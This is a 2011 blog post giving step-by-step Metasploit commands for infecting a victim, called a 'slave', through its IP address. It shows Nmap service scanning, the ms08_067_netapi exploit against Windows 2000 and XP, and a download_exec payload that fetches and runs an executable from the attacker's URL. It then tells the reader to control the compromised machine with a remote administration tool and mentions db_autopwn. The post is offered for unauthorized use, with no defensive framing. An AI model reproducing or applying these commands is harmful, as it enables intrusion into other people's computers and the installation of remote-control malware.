Sunday, 13 November 2011

Infection via IP address.

A lot of the time I see this question asked here & everywhere on the forums that:
"Is it possible to infect slave using his IP address?"

So, I am going to show you how to do it.


Requirements:


Nmap
Metasploit

First of all you need the target IP of your slave.


Then open Metasploit Console & type db_create.

[Usage: This will create or connect you to a(your) database.]

Once you do that type Nmap.

[Usage: This will load Nmap in Metasploit Console]

Next you need to type db_nmap -sT -sV <target IP>

[This will scan OS, Ports, and Services running on the slave's computer.]
Wait for 5 minutes to complete the scan.

Once done, Note down the OS, Ports, and Services running on the slave's computer.


Now it's time to exploit the slave's machine.

Exploit depends on the OS, Ports, and Services running on the slave's computer.
So, you're lucky if you get OS WIN XP or 2000 because it's easy to exploit them.
No matter whether they are protected by a firewall or not.

Now:


Windows 2000 (all versions SP1, SP2, SP3, SP4)

Windows XP (all versions SP1, SP2, SP3)

Type show exploits

[Usage: This will show all the exploits in its database.]

Next you need to type use windows/smb/ms08_067_netapi

[Usage: This will select the exploit windows/smb/ms08_067_netapi]

Now Type show targets

[Usage: This will show all targets by exploit]

Now Type set target 0

[Usage: This will set target to 0 specified]
Then type show payloads
[Usage: This will bring up all the payloads]
Next type set payload windows/download_exec
[Usage: This will set the payload as windows/download_exec]

Then Type show options

[Usage: This will show all options in the exploit & payload]

In window you will see many options, in which you need to

Fill only two options RHOST & URL.

Type set RHOST <xxx.xxx.xxx.xxx >

[Usage: This will set RHOST (slave's ip) to xxx.xxx.xxx.xxx]

Next Type set URL
http://www.xxxx.com/xxx.exe
[Usage: This will set the URL to your direct server link.]

Finally you need to type exploit

[Usage: This will launch the exploit & your slave will be infected.]

You can now control your slave with a RAT. (Remote administration tool.)

So, any versions of Win 2000-XP can be exploited easily.

You can use the command db_autopwn –p –t –e.


In most cases you get a shell.

0 comments:

Post a Comment